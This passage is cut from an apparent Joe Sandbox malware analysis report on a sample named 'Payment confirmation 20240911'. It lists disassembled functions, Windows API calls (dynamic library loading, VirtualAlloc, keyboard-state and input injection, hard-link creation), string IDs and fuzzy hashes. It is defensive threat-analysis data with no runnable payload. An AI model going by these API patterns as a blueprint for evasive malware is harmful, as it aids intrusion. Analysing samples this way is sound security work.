                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,01303028,?), ref: 01302F79
                                          • GetProcAddress.KERNEL32(00000000), ref: 01302F80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          • API String ID: 2574300362-340411864
                                          • Opcode ID: 68249c6668112657e4b6391286adede09c269aa91e8c436798228591ec4cd010
                                          • Instruction ID: cd93a26edae67a879866e37208082cb311627bedcddaaaab3ce8feb73b6f2565
                                          • Opcode Fuzzy Hash: 68249c6668112657e4b6391286adede09c269aa91e8c436798228591ec4cd010
                                          • Instruction Fuzzy Hash: 8BE01A78794300ABEBB15FB6EC4DB9536ACA704B4AF408028F142D6198CBB55054EF05
                                          Function 01303034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,01302F4E), ref: 0130304E
                                          • GetProcAddress.KERNEL32(00000000), ref: 01303055
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 2574300362-2819208100
                                          • Opcode ID: 4ff0a8aadc7cfd7a995d086c8bbc2db7bb7d9667473661b7722d445ee8d027e7
                                          • Instruction ID: f2510c36a13f685ac94ae80b4701e3cd37791a7b4474e4ac90f05d8988e843d0
                                          • Opcode Fuzzy Hash: 4ff0a8aadc7cfd7a995d086c8bbc2db7bb7d9667473661b7722d445ee8d027e7
                                          • Instruction Fuzzy Hash: 08E0ECB8B49300EFEB359FA2ED0DB553AACB714706F504118F14BD62ACCBB66010DB14
                                          Function 0135BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: b337772a6e28452127b9e716892a04c499b1ff5ddfc8bcbba4ed3fbb0bb159c0
                                          • Instruction ID: 7ca04130116895542452023ab325e9334272847d4649c1c671b4fcf4b1b1a66a
                                          • Opcode Fuzzy Hash: b337772a6e28452127b9e716892a04c499b1ff5ddfc8bcbba4ed3fbb0bb159c0
                                          • Instruction Fuzzy Hash: 2EE0127181801CEADB95C6918D16DFAF3BDBB04A09F0184D2FD5691808D735DB548B11
                                          Function 012FE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 012FE6B4
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 012FE6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: 695a85b4fb37196ad7ac2045e659de40a244b092bd4c322bd79c7754f9a74030
                                          • Instruction ID: 445331bf99f62c1ec2f3db3c639d3b5e67684699123ab07bb3c46a8e1d95727e
                                          • Opcode Fuzzy Hash: 695a85b4fb37196ad7ac2045e659de40a244b092bd4c322bd79c7754f9a74030
                                          • Instruction Fuzzy Hash: 2CD05E34910B169EDB325B6AA44860277D8AB04206F02943DE69A91224D6B0C4808750
                                          Function 012FE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 012FE6F1
                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?), ref: 012FE703
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: IsWow64Process$kernel32.dll
                                          • API String ID: 2574300362-3024904723
                                          • Opcode ID: 105c1a3013b0f4fdb5cc1597f2dd240dd981db2adade2ea1dbbc672ae4c5dcf3
                                          • Instruction ID: 126807a689fa067a28c0cad8603e5ac5b871e54761312519bdfe2d37c3170644
                                          • Opcode Fuzzy Hash: 105c1a3013b0f4fdb5cc1597f2dd240dd981db2adade2ea1dbbc672ae4c5dcf3
                                          • Instruction Fuzzy Hash: EED05E349107139ADB356B66A4886037BD8AF04604F02842DE7DA92221D7B0C4808750
                                          Function 0133EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0133EBC7
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0133EBAF,?,0133EAAC), ref: 0133EBD9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: b52708df711f0755d94653d2afd1a02b1a81e0f72423ac2ca3751ff8f701ab3d
                                          • Instruction ID: b1fa955233dd4c635aeac87301a220a0f68e0a69f3389b68ab5e949d58535f5c
                                          • Opcode Fuzzy Hash: b52708df711f0755d94653d2afd1a02b1a81e0f72423ac2ca3751ff8f701ab3d
                                          • Instruction Fuzzy Hash: 40D05E345087129BDB355F76A448A0236D8AB44308F10C42DE4D791220DAB0D8808760
                                          Function 0132137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(oleaut32.dll), ref: 01321389
                                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser,?,01321440), ref: 0132139B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                          • API String ID: 2574300362-1071820185
                                          • Opcode ID: df0af1a996cbda5d3221624c3fb3748aef6b8ae4aaf7b39737c524fcca48529c
                                          • Instruction ID: 2843329f8f08416de9457db8d7be1fe190d6a9ee4a4d2213efa5fdb99e61e4af
                                          • Opcode Fuzzy Hash: df0af1a996cbda5d3221624c3fb3748aef6b8ae4aaf7b39737c524fcca48529c
                                          • Instruction Fuzzy Hash: F4D0C774904722DFDB705FBAE50974276D8BF0471DF14841DE9D7D1714D6B4D4809750
                                          Function 013213A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(oleaut32.dll), ref: 013213B4
                                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 013213C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                          • API String ID: 2574300362-1587604923
                                          • Opcode ID: dd6db19c4bde227f21d60b98c22ad964d8a4d715f2ecde88c4d7f69f7fe3a7a6
                                          • Instruction ID: d23a3e542defa9e3a9eb1eb271940060f1351b894d409aebee4449159cfea88e
                                          • Opcode Fuzzy Hash: dd6db19c4bde227f21d60b98c22ad964d8a4d715f2ecde88c4d7f69f7fe3a7a6
                                          • Instruction Fuzzy Hash: 57D0A770604722DFDB311F7AE40864236DDAB4430CF00841DE697D1724DAB0C4848710
                                          Function 01343ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 01343ADA
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01343AEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: 71a9986285eed31c451ee7e772a54f3bfe5c6628b04a780a265254277840f180
                                          • Instruction ID: 435f837192f67e5ce9bdac560b7fdcf9e580c12ce759867cd7c8dbb93702a8b9
                                          • Opcode Fuzzy Hash: 71a9986285eed31c451ee7e772a54f3bfe5c6628b04a780a265254277840f180
                                          • Instruction Fuzzy Hash: 41D05270A40323CFEB308BAAA8096423AE8AF04218F00842DE4A692210EAF0D0808B54
                                          Function 0131A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e060200230feef82304ba680f14df504dd24cc759742afe9b1eafb031c4de56
                                          • Instruction ID: c1062f261eef77b6204ab0f0a5e78d021dbbf42ca8424cc9c6b2561a5b36f9f4
                                          • Opcode Fuzzy Hash: 4e060200230feef82304ba680f14df504dd24cc759742afe9b1eafb031c4de56
                                          • Instruction Fuzzy Hash: C1C1B475A0124AEFDB19CF94C984EAEBBB5FF48309F108599E902EB255D730DE41CB90
                                          Function 012EAA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper_wcscmp
                                          • String ID:
                                          • API String ID: 820872866-0
                                          • Opcode ID: f53dd81955d7a53fc769661b500f93bff1feaa930cdc39b8e236d5101a1b344d
                                          • Instruction ID: 9c36e90b72179d2300a78156a487fcda44b0fe52ed9c3c3184fc25521b722daa
                                          • Opcode Fuzzy Hash: f53dd81955d7a53fc769661b500f93bff1feaa930cdc39b8e236d5101a1b344d
                                          • Instruction Fuzzy Hash: 2DA1FE70A2010B9BDF15DF69E5896BEBBE5FF54300F94456AED4683290EB319870C781
                                          Function 01340D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 01340D85
                                          • CharLowerBuffW.USER32(?,?), ref: 01340DC8
                                            • Part of subcall function 01340458: CharLowerBuffW.USER32(?,?), ref: 01340478
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 01340FB2
                                          • _memmove.LIBCMT ref: 01340FC2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: a09945d71f7ab177fbd90be36919d550deab44fc3c633e8c49b8b2a5c9a0a99a
                                          • Instruction ID: a3e80c4f02ce5163a572a18a68c57fdd920c1295d6d94ccbbfd5fd7cd3b476d5
                                          • Opcode Fuzzy Hash: a09945d71f7ab177fbd90be36919d550deab44fc3c633e8c49b8b2a5c9a0a99a
                                          • Instruction Fuzzy Hash: F4B1AF756143018FC718DF28C48096ABBE4FF99718F14896EFA89DB351DB31E94ACB81
                                          Function 0133AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0133AF56
                                          • CoUninitialize.OLE32 ref: 0133AF61
                                            • Part of subcall function 01321050: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 013210B8
                                          • VariantInit.OLEAUT32(?), ref: 0133AF6C
                                          • VariantClear.OLEAUT32(?), ref: 0133B23F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: e0a2c43f6d02ab2e1f8b0eb846bfe97a3425ab7e73d5455aa392c65a4353474d
                                          • Instruction ID: e0a787eab40152df4c9e1a3d72a6ee6c776d604639613f3c79b50b77c2ef551e
                                          • Opcode Fuzzy Hash: e0a2c43f6d02ab2e1f8b0eb846bfe97a3425ab7e73d5455aa392c65a4353474d
                                          • Instruction Fuzzy Hash: 14A14A756047029FDB10DF18C894B2AF7E4FF98324F04855DEA9AAB3A0DB30E904CB85
                                          Function 012EC320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memmove.LIBCMT ref: 012EC419
                                          • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 012EC495
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FileRead_memmove
                                          • String ID:
                                          • API String ID: 1325644223-0
                                          • Opcode ID: af1ebde6bd858535cf8cc34ab69504e0243a9d69d79f1fd1ace340b53c6bc866
                                          • Instruction ID: ac27484817f47b59f21a0abfbb78f1bae53945e17a7adf4d87861ec4258a866f
                                          • Opcode Fuzzy Hash: af1ebde6bd858535cf8cc34ab69504e0243a9d69d79f1fd1ace340b53c6bc866
                                          • Instruction Fuzzy Hash: E1A1EE70A1460AEBEB04CF99C888BB9FBF4FF01700F448195E9659B285E771E960CB91
                                          Function 013042EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                          • String ID:
                                          • API String ID: 3877424927-0
                                          • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                          • Instruction ID: 0ff70b24dfc3a3bfd7116d22738be1ec3cfd1083a01a6793cc6c6d0b505a8886
                                          • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                          • Instruction Fuzzy Hash: 5651D830A00306DBDB268FAD89A066E7BF5AF40328F14876DFA75966D0D770DB618B40
                                          Function 0131D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0131D258
                                          • __itow.LIBCMT ref: 0131D292
                                            • Part of subcall function 0131D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0131D549
                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0131D2FB
                                          • __itow.LIBCMT ref: 0131D350
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow
                                          • String ID:
                                          • API String ID: 3379773720-0
                                          • Opcode ID: a589670b4bb4b57dd6fc85af62ceed33097bb6e3e21cda327521bff9bed4f3a0
                                          • Instruction ID: dc48793be41967622cae507cd01674570e5bb1b90976988ef7c8dec1f71ea064
                                          • Opcode Fuzzy Hash: a589670b4bb4b57dd6fc85af62ceed33097bb6e3e21cda327521bff9bed4f3a0
                                          • Instruction Fuzzy Hash: 4341D671A0060AAFDF15DF98CC59FFE7BF9AF5A714F000029EA05A3284DB749A45CB61
                                          Function 0132EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0132EF32
                                          • GetLastError.KERNEL32(?,00000000), ref: 0132EF58
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0132EF7D
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0132EFA9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: 3773891cb4157cf3e4d901c30c30a75b3931657721057d2d64e585cbf81d8c4c
                                          • Instruction ID: 361ddd6f3c456781b95090e6ab95ef5a27632b009abe63446e40afcb776dc803
                                          • Opcode Fuzzy Hash: 3773891cb4157cf3e4d901c30c30a75b3931657721057d2d64e585cbf81d8c4c
                                          • Instruction Fuzzy Hash: 24415839610621DFCF11EF59C548A59BBE5EF99320B19C098E88AAF361DB30FC04DB91
                                          Function 01324497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 013244EE
                                          • SetKeyboardState.USER32(00000080), ref: 0132450A
                                          • PostMessageW.USER32 ref: 0132456A
                                          • SendInput.USER32(00000001,?,0000001C), ref: 013245C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
